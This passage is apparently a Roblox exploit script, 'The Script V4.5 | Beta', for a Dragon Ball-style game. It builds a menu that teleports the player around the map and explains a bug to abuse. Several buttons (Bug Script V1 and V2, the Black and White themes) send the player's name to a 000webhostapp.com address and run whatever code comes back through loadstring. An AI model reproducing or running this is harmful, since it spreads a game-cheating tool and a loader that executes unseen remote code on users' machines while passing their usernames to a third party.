kms.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
kms.BorderSizePixel = 0
kms.Position = UDim2.new(-0.00287356321, 0, 0.00638977624, 0)
kms.Size = UDim2.new(0, 155, 0, 23)
kms.Font = Enum.Font.SourceSans
kms.Text = "The Script V4.5 | Beta"
kms.TextColor3 = Color3.new(1, 1, 1)
kms.TextScaled = true
kms.TextSize = 14
kms.TextWrapped = true

Destroy.Name = "Destroy"
Destroy.Parent = TheGui
Destroy.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Destroy.BorderSizePixel = 5
Destroy.Position = UDim2.new(0.00473933667, 0, 0.900667846, 0)
Destroy.Size = UDim2.new(0, 163, 0, 38)
Destroy.Font = Enum.Font.SourceSans
Destroy.Text = "Destroy"
Destroy.TextColor3 = Color3.new(1, 1, 1)
Destroy.TextScaled = true
Destroy.TextSize = 14
Destroy.TextWrapped = true

BugMain.Name = "BugMain"
BugMain.Parent = TheGui
BugMain.Active = true
BugMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
BugMain.Draggable = true
BugMain.Position = UDim2.new(0.350941569, 0, 0.134198666, 0)
BugMain.Selectable = true
BugMain.Size = UDim2.new(0, 466, 0, 460)
BugMain.Visible = false

Bar21.Name = "Bar21"
Bar21.Parent = BugMain
Bar21.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar21.BorderSizePixel = 0
Bar21.Position = UDim2.new(-0.00200000009, 0, -0.00700000022, 0)
Bar21.Size = UDim2.new(0, 466, 0, 29)

Bar22.Name = "Bar22"
Bar22.Parent = BugMain
Bar22.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar22.BorderSizePixel = 0
Bar22.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar22.Size = UDim2.new(0, 467, 0, 6)

Textinha.Name = "Textinha"
Textinha.Parent = BugMain
Textinha.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Textinha.BorderSizePixel = 0
Textinha.Position = UDim2.new(0, 0, 0.00217391294, 0)
Textinha.Size = UDim2.new(0, 176, 0, 22)
Textinha.Font = Enum.Font.SourceSans
Textinha.Text = "The Script V4.0 | Beta"
Textinha.TextColor3 = Color3.new(1, 1, 1)
Textinha.TextScaled = true
Textinha.TextSize = 14
Textinha.TextWrapped = true

BugScriptV1.Name = "BugScriptV1"
BugScriptV1.Parent = BugMain
BugScriptV1.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BugScriptV1.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BugScriptV1.BorderSizePixel = 4
BugScriptV1.Position = UDim2.new(0.0274850354, 0, 0.191304356, 0)
BugScriptV1.Size = UDim2.new(0, 200, 0, 50)
BugScriptV1.Font = Enum.Font.SourceSansBold
BugScriptV1.Text = "Bug Script V1"
BugScriptV1.TextColor3 = Color3.new(1, 1, 1)
BugScriptV1.TextScaled = true
BugScriptV1.TextSize = 14
BugScriptV1.TextWrapped = true

Okiu.Name = "Okiu"
Okiu.Parent = BugMain
Okiu.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Okiu.BorderSizePixel = 0
Okiu.Position = UDim2.new(0.148068666, 0, 0.0695652142, 0)
Okiu.Size = UDim2.new(0, 327, 0, 50)
Okiu.Font = Enum.Font.SourceSans
Okiu.Text = "Which One Do You Want To Execute?"
Okiu.TextColor3 = Color3.new(1, 1, 1)
Okiu.TextScaled = true
Okiu.TextSize = 14
Okiu.TextWrapped = true

BugScriptV2.Name = "BugScriptV2"
BugScriptV2.Parent = BugMain
BugScriptV2.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BugScriptV2.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BugScriptV2.BorderSizePixel = 4
BugScriptV2.Position = UDim2.new(0.54036057, 0, 0.191304356, 0)
BugScriptV2.Size = UDim2.new(0, 200, 0, 50)
BugScriptV2.Font = Enum.Font.SourceSansBold
BugScriptV2.Text = "Bug Script V2"
BugScriptV2.TextColor3 = Color3.new(1, 1, 1)
BugScriptV2.TextScaled = true
BugScriptV2.TextSize = 14
BugScriptV2.TextWrapped = true

_4ttf.Name = "4ttf"
_4ttf.Parent = BugMain
_4ttf.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
_4ttf.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
_4ttf.BorderSizePixel = 0
_4ttf.Position = UDim2.new(0.928767145, 0, 0.009877529, 0)
_4ttf.Size = UDim2.new(0, 33, 0, 22)
_4ttf.Font = Enum.Font.SourceSansBold
_4ttf.Text = "X"
_4ttf.TextColor3 = Color3.new(1, 1, 1)
_4ttf.TextScaled = true
_4ttf.TextSize = 14
_4ttf.TextWrapped = true

ForTheBugTutorialV2.Name = "ForTheBugTutorialV2"
ForTheBugTutorialV2.Parent = TheGui
ForTheBugTutorialV2.Active = true
ForTheBugTutorialV2.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ForTheBugTutorialV2.BorderSizePixel = 0
ForTheBugTutorialV2.Draggable = true
ForTheBugTutorialV2.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
ForTheBugTutorialV2.Selectable = true
ForTheBugTutorialV2.Size = UDim2.new(0, 470, 0, 454)
ForTheBugTutorialV2.Visible = false

Bar25.Name = "Bar25"
Bar25.Parent = ForTheBugTutorialV2
Bar25.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar25.BorderSizePixel = 0
Bar25.Size = UDim2.new(0, 470, 0, 40)

Bar26.Name = "Bar26"
Bar26.Parent = ForTheBugTutorialV2
Bar26.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar26.BorderSizePixel = 0
Bar26.Position = UDim2.new(0, 0, 0.0881057233, 0)
Bar26.Size = UDim2.new(0, 470, 0, 6)

asd3d.Name = "asd3d"
asd3d.Parent = ForTheBugTutorialV2
asd3d.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
asd3d.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
asd3d.BorderSizePixel = 0
asd3d.Position = UDim2.new(0.928848386, 0, 0.0307220854, 0)
asd3d.Size = UDim2.new(0, 33, 0, 22)
asd3d.Font = Enum.Font.SourceSansBold
asd3d.Text = "X"
asd3d.TextColor3 = Color3.new(1, 1, 1)
asd3d.TextScaled = true
asd3d.TextSize = 14
asd3d.TextWrapped = true

poo.Name = "poo"
poo.Parent = ForTheBugTutorialV2
poo.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
poo.BorderSizePixel = 0
poo.Position = UDim2.new(0.00638297852, 0, 0.101321585, 0)
poo.Size = UDim2.new(0, 464, 0, 408)
poo.Font = Enum.Font.SourceSans
poo.Text = "1. Go To HTC\n2. When You Spawn, Dont Move\n3. Execute The Bug Script V2\n4. Wait Until Goku Respawn\n5. Now Enjoy!"
poo.TextColor3 = Color3.new(0.152941, 0.54902, 0.690196)
poo.TextScaled = true
poo.TextSize = 14
poo.TextWrapped = true

Z.Name = "Z"
Z.Parent = ForTheBugTutorialV2
Z.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Z.BorderSizePixel = 0
Z.Position = UDim2.new(0.00600000005, 0, 0.0149999997, 0)
Z.Size = UDim2.new(0, 154, 0, 26)
Z.Font = Enum.Font.SourceSans
Z.Text = "The Script V4.0 | Beta"
Z.TextColor3 = Color3.new(1, 1, 1)
Z.TextScaled = true
Z.TextSize = 14
Z.TextWrapped = true

TutorialBugMain.Name = "TutorialBugMain"
TutorialBugMain.Parent = TheGui
TutorialBugMain.Active = true
TutorialBugMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TutorialBugMain.Draggable = true
TutorialBugMain.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
TutorialBugMain.Selectable = true
TutorialBugMain.Size = UDim2.new(0, 466, 0, 460)
TutorialBugMain.Visible = false

Bar23.Name = "Bar23"
Bar23.Parent = TutorialBugMain
Bar23.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar23.BorderSizePixel = 0
Bar23.Position = UDim2.new(0, 0, 0.00217391294, 0)
Bar23.Size = UDim2.new(0, 466, 0, 29)

Bar24.Name = "Bar24"
Bar24.Parent = TutorialBugMain
Bar24.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar24.BorderSizePixel = 0
Bar24.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar24.Size = UDim2.new(0, 467, 0, 6)

PodeSer.Name = "PodeSer"
PodeSer.Parent = TutorialBugMain
PodeSer.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
PodeSer.BorderSizePixel = 0
PodeSer.Position = UDim2.new(0, 0, 0.00217391294, 0)
PodeSer.Size = UDim2.new(0, 176, 0, 22)
PodeSer.Font = Enum.Font.SourceSans
PodeSer.Text = "The Script V4.0 | Beta"
PodeSer.TextColor3 = Color3.new(1, 1, 1)
PodeSer.TextScaled = true
PodeSer.TextSize = 14
PodeSer.TextWrapped = true

BugScriptV11.Name = "BugScriptV11"
BugScriptV11.Parent = TutorialBugMain
BugScriptV11.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BugScriptV11.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BugScriptV11.BorderSizePixel = 4
BugScriptV11.Position = UDim2.new(0.0274850354, 0, 0.191304356, 0)
BugScriptV11.Size = UDim2.new(0, 200, 0, 50)
BugScriptV11.Font = Enum.Font.SourceSansBold
BugScriptV11.Text = "Bug Script V1"
BugScriptV11.TextColor3 = Color3.new(1, 1, 1)
BugScriptV11.TextScaled = true
BugScriptV11.TextSize = 14
BugScriptV11.TextWrapped = true

ab46.Name = "ab46"
ab46.Parent = TutorialBugMain
ab46.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ab46.BorderSizePixel = 0
ab46.Position = UDim2.new(0.109442055, 0, 0.0695652142, 0)
ab46.Size = UDim2.new(0, 364, 0, 50)
ab46.Font = Enum.Font.SourceSans
ab46.Text = "What Bug Tutorial You Would Like To See?"
ab46.TextColor3 = Color3.new(1, 1, 1)
ab46.TextScaled = true
ab46.TextSize = 14
ab46.TextWrapped = true

BugScriptV22.Name = "BugScriptV22"
BugScriptV22.Parent = TutorialBugMain
BugScriptV22.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BugScriptV22.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BugScriptV22.BorderSizePixel = 4
BugScriptV22.Position = UDim2.new(0.54036057, 0, 0.191304356, 0)
BugScriptV22.Size = UDim2.new(0, 200, 0, 50)
BugScriptV22.Font = Enum.Font.SourceSansBold
BugScriptV22.Text = "Bug Script V2"
BugScriptV22.TextColor3 = Color3.new(1, 1, 1)
BugScriptV22.TextScaled = true
BugScriptV22.TextSize = 14
BugScriptV22.TextWrapped = true

_56u56h1.Name = "56u56h1"
_56u56h1.Parent = TutorialBugMain
_56u56h1.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
_56u56h1.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
_56u56h1.BorderSizePixel = 0
_56u56h1.Position = UDim2.new(0.928767145, 0, 0.009877529, 0)
_56u56h1.Size = UDim2.new(0, 33, 0, 22)
_56u56h1.Font = Enum.Font.SourceSansBold
_56u56h1.Text = "X"
_56u56h1.TextColor3 = Color3.new(1, 1, 1)
_56u56h1.TextScaled = true
_56u56h1.TextSize = 14
_56u56h1.TextWrapped = true

CreditsMain.Name = "CreditsMain"
CreditsMain.Parent = TheGui
CreditsMain.Active = true
CreditsMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
CreditsMain.Draggable = true
CreditsMain.Position = UDim2.new(0.350941569, 0, 0.134198666, 0)
CreditsMain.Selectable = true
CreditsMain.Size = UDim2.new(0, 466, 0, 460)
CreditsMain.Visible = false

Bar29.Name = "Bar29"
Bar29.Parent = CreditsMain
Bar29.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar29.BorderSizePixel = 0
Bar29.Position = UDim2.new(-0.00200000009, 0, -0.00700000022, 0)
Bar29.Size = UDim2.new(0, 466, 0, 29)

Bar30.Name = "Bar30"
Bar30.Parent = CreditsMain
Bar30.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar30.BorderSizePixel = 0
Bar30.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar30.Size = UDim2.new(0, 467, 0, 6)

ApenasUmTexto.Name = "ApenasUmTexto"
ApenasUmTexto.Parent = CreditsMain
ApenasUmTexto.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ApenasUmTexto.BorderSizePixel = 0
ApenasUmTexto.Position = UDim2.new(0, 0, 0.00217391294, 0)
ApenasUmTexto.Size = UDim2.new(0, 176, 0, 22)
ApenasUmTexto.Font = Enum.Font.SourceSans
ApenasUmTexto.Text = "The Script V4.5 | Beta"
ApenasUmTexto.TextColor3 = Color3.new(1, 1, 1)
ApenasUmTexto.TextScaled = true
ApenasUmTexto.TextSize = 14
ApenasUmTexto.TextWrapped = true

Vlw.Name = "Vlw"
Vlw.Parent = CreditsMain
Vlw.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Vlw.BorderSizePixel = 0
Vlw.Position = UDim2.new(-0.00214592274, 0, 0.0695652142, 0)
Vlw.Size = UDim2.new(0, 465, 0, 428)
Vlw.Font = Enum.Font.SourceSans
Vlw.Text = "WeAreEvils - Creator of The Script. <3"
Vlw.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451)
Vlw.TextScaled = true
Vlw.TextSize = 14
Vlw.TextWrapped = true

Saidinha.Name = "Saidinha"
Saidinha.Parent = CreditsMain
Saidinha.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Saidinha.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Saidinha.BorderSizePixel = 0
Saidinha.Position = UDim2.new(0.928767145, 0, 0.009877529, 0)
Saidinha.Size = UDim2.new(0, 33, 0, 22)
Saidinha.Font = Enum.Font.SourceSansBold
Saidinha.Text = "X"
Saidinha.TextColor3 = Color3.new(1, 1, 1)
Saidinha.TextScaled = true
Saidinha.TextSize = 14
Saidinha.TextWrapped = true

Execute.MouseButton1Down:connect(function()
TheMain.Visible = false
ForExecute.Visible = true
end)

Tutorial.MouseButton1Down:connect(function()
TheMain.Visible = false
TheTutorialMain.Visible = true
end)

Themes.MouseButton1Down:connect(function()
TheMain.Visible = false
ThemesMain.Visible = true
end)

Leave.MouseButton1Down:connect(function()
ForTheBugTutorialV1.Visible = false
TutorialBugMain.Visible = true
end)

Bug.MouseButton1Down:connect(function()
ForExecute.Visible = false
BugMain.Visible = true
end)

Go.MouseButton1Down:connect(function()
ForExecute.Visible = false
TheMain.Visible = true
end)

TeleportToArea.MouseButton1Down:connect(function()
ForExecute.Visible = false
TeleportMain.Visible = true
end)

Away.MouseButton1Down:connect(function()
TheTutorialMain.Visible = false
TheMain.Visible = true
end)

BugTutorial.MouseButton1Down:connect(function()
TheTutorialMain.Visible = false
TutorialBugMain.Visible = true
end)

TeleportTutorial.MouseButton1Down:connect(function()
TheTutorialMain.Visible = false
ForTheTeleportTutorial.Visible = true
end)

Earth.MouseButton1Down:connect(function()
TeleportMain.Visible = false
EarthTeleport.Visible = true
end)

Bye.MouseButton1Down:connect(function()
TeleportMain.Visible = false
ForExecute.Visible = true
end)

Namek.MouseButton1Down:connect(function()
TeleportMain.Visible = false
NamekTeleport.Visible = true
end)

WestCity.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-573.134949, 23.0628281, -2885.85327, -0.04600055061, 0, -0.998941183, 0, 1, 0, 0.998941183, 0, -0.0460055061)
end)

Exat.MouseButton1Down:connect(function()
EarthTeleport.Visible = false
TeleportMain.Visible = true
end)

CentralCity.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer
Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-3834.83301, 23.0629158, -1428.2417, -0.0131634176, -0, -0.999913335, -0, 1.00000012, -0, 0.999913454, 0, -0.0131634157)
end)

SatanCity.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-5967.35742, 140.072052, -3038.30493, -0.999459803, 0, 0.0328656696, 0, 0.99999994, -0, -0.328656733, 0, -0.999459686)
end)

HTC.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(2523.39307, 3948.87988, -2273.81055, -0.102178454, -0, -0.994766057, -0, 1.00000012, -0, 0.994766176, 0, -0.102178439)
end)

Tournament.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-2054.81201, 21.0287666, -7658.54736, 1, 0, 0, 0, 1, 0, 0, 0, 1)
end)

Namak.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(1418.66394, 93.6965103, 3181.95215, -0.993133128, 0, 0.116990201, 0, 1.00000012, -0, -0.116990201, 0, -0.993133128)
end)

Spece.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-1200.68689, 22.6602058, -2926.6438, -0.0456261263, -0, -0.998958647, -0, 1.00000012, -0, 0.998958647, 0, -0.456261262)
end)

Futare.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(772.805847, 23.1628513, -1806.03662, -0.624125957, -0, -0.781323732, -0, 1, -0, 0.781323732, 0, -0.624125957)
end)

Bai.MouseButton1Down:connect(function()
ForTheTeleportTutorial.Visible = false
TheTutorialMain.Visible = true
end)

Open.MouseButton1Down:connect(function()
TheMain.Visible = true
Open.Visible = false
Close.Visible = true
Sure.Visible = false
end)

Close.MouseButton1Down:connect(function()
TheMain.Visible = false
Open.Visible = true
Close.Visible = false
EarthTeleport.Visible = false
ForExecute.Visible = false
ForTheBugTutorialV1.Visible = false
ForTheTeleportTutorial.Visible = false
TeleportMain.Visible = false
TheTutorialMain.Visible = false
ThemesMain.Visible = false
Sure.Visible = false
NamekTeleport.Visible = false
BugMain.Visible = false
ForTheBugTutorialV2.Visible = false
TutorialBugMain.Visible = false
CreditsMain.Visible = false
end)

BlackTheme.MouseButton1Down:connect(function()
TheMain.Visible = false
Open.Visible = false
Close.Visible = false
EarthTeleport.Visible = false
ForExecute.Visible = false
ForTheBugTutorialV1.Visible = false
ForTheTeleportTutorial.Visible = false
TeleportMain.Visible = false
TheTutorialMain.Visible = false
ThemesMain.Visible = false
Destroy.Visible = false
Sure.Visible = false
BugMain.Visible = false
ForTheBugTutorialV2.Visible = false
CreditsMain.Visible = false

local player = game.Players.LocalPlayer.Name
local result = game:HttpPost("https://3242d3532523.000webhostapp.com/yhBlackGUI.txt", player, true)

loadstring(result)()
end)

WhiteTheme.MouseButton1Down:connect(function()
TheMain.Visible = false
Open.Visible = false
Close.Visible = false
EarthTeleport.Visible = false
ForExecute.Visible = false
ForTheBugTutorialV1.Visible = false
ForTheTeleportTutorial.Visible = false
TeleportMain.Visible = false
TheTutorialMain.Visible = false
ThemesMain.Visible = false
Destroy.Visible = false
Sure.Visible = false
BugMain.Visible = false
ForTheBugTutorialV2.Visible = false
CreditsMain.Visible = false

local player = game.Players.LocalPlayer.Name
local result = game:HttpPost("https://3242d3532523.000webhostapp.com/457WhiteGUITest.txt", player, true)

loadstring(result)()
end)

Die.MouseButton1Down:connect(function()
ThemesMain.Visible = false
TheMain.Visible = true
end)

Frieza.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(2707.23291, 108.969101, 445.294952, -0.998629034, 0, 0.0523469895, 0, 1.00000012, -0, -0.052346997, 0, -0.998628914)
end)

Exot.MouseButton1Down:connect(function()
NamekTeleport.Visible = false
TeleportMain.Visible = true
end)

SecretArea.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-1974.51672, 78.3083115, -2956.31323, 0.999998569, 0, 0.00171989901, -0, 1, -0, -0.00171989924, 0, 0.99999845)
end)

Guldos.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-1142.85791, 47.8034439, -2573.95581, -0.999470532, -0, -0.0325397328, -0, 1.00000012, -0, 0.0325397365, 0, -0.999470413)
end)

Captain.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(952.801208, 57.4968948, 67.1577454, 0.986927807, 0, -0.161163494, -0, 1, -0, 0.161163509, 0, 0.986927688)
end)

Jeice.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(4407.87598, 21.0360775, -197.549652, -0.528303444, -0, -0.849055648, -0, 1.00000012, -0, 0.849055767, 0, -0.528303385)
end)

Recoome.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(585.931763, 88.1771698, 1930.10278, 0.619142234, 0, -0.785278857, -0, 1, -0, 0.785278976, 0, 0.619142175)
end)

Universal.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(-2553.19946, 20.3544579, 1105.25085, -0.0476115532, 0, 0.998865962, 0, 1.00000012, -0, -0.998865962, 0, -0.0476115532)
end)

Terra.MouseButton1Down:connect(function()
game:GetService("TeleportService"):Teleport(536102540, game.Players.LocalPlayer)
end)

Burter.MouseButton1Down:connect(function()
local Plr = game.Players.LocalPlayer

Plr.Character.HumanoidRootPart.CFrame = CFrame.new(4573.34863, 210.706619, 1416.94604, 0.999749541, 0, 0.0223796684, -0, 1, -0, -0.0223796684, 0, 0.999749541)
end)

Yes.MouseButton1Down:connect(function()
TheMain.Visible = false
Open.Visible = false
Close.Visible = false
EarthTeleport.Visible = false
ForExecute.Visible = false
ForTheBugTutorialV1.Visible = false
ForTheTeleportTutorial.Visible = false
TeleportMain.Visible = false
TheTutorialMain.Visible = false
ThemesMain.Visible = false
Sure.Visible = false
Destroy.Visible = false
BugMain.Visible = false
ForTheBugTutorialV2.Visible = false
TutorialBugMain.Visible = false
CreditsMain.Visible = false
end)

No.MouseButton1Down:connect(function()
Sure.Visible = false
end)

Destroy.MouseButton1Down:connect(function()
Sure.Visible = true
Close.Visible = false
Open.Visible = true
BugMain.Visible = false
EarthTeleport.Visible = false
ForExecute.Visible = false
ForTheBugTutorialV1.Visible = false
ForTheBugTutorialV2.Visible = false
ForTheTeleportTutorial.Visible = false
TeleportMain.Visible = false
TheTutorialMain.Visible = false
TutorialBugMain.Visible = false
TheMain.Visible = false
ThemesMain.Visible = false
CreditsMain.Visible = false
end)

BugScriptV1.MouseButton1Down:connect(function()
local player = game.Players.LocalPlayer.Name
local result = game:HttpPost("https://3242d3532523.000webhostapp.com/nBugScript.txt", player, true)

loadstring(result)()
end)

BugScriptV2.MouseButton1Down:connect(function()
local player = game.Players.LocalPlayer.Name
local result = game:HttpPost("https://3242d3532523.000webhostapp.com/6hbBugScriptV2.txt", player, true)

loadstring(result)()
end)

_56u56h1.MouseButton1Down:connect(function()
BugMain.Visible = false
ForExecute.Visible = true
end)

asd3d.MouseButton1Down:connect(function()
ForTheBugTutorialV2.Visible = false
TutorialBugMain.Visible = true
end)

BugScriptV11.MouseButton1Down:connect(function()
TutorialBugMain.Visible = false
ForTheBugTutorialV1.Visible = true
end)

BugScriptV22.MouseButton1Down:connect(function()
TutorialBugMain.Visible = false
ForTheBugTutorialV2.Visible = true
end)

_56u56h1.MouseButton1Down:connect(function()
TutorialBugMain.Visible = false
TheTutorialMain.Visible = true
end)

_4ttf.MouseButton1Down:connect(function()
BugMain.Visible = false
ForExecute.Visible = true
end)

Credits.MouseButton1Down:connect(function()
TheMain.Visible = false
CreditsMain.Visible = true
end)

Saidinha.MouseButton1Down:connect(function()
CreditsMain.Visible = false
TheMain.Visible = true
end)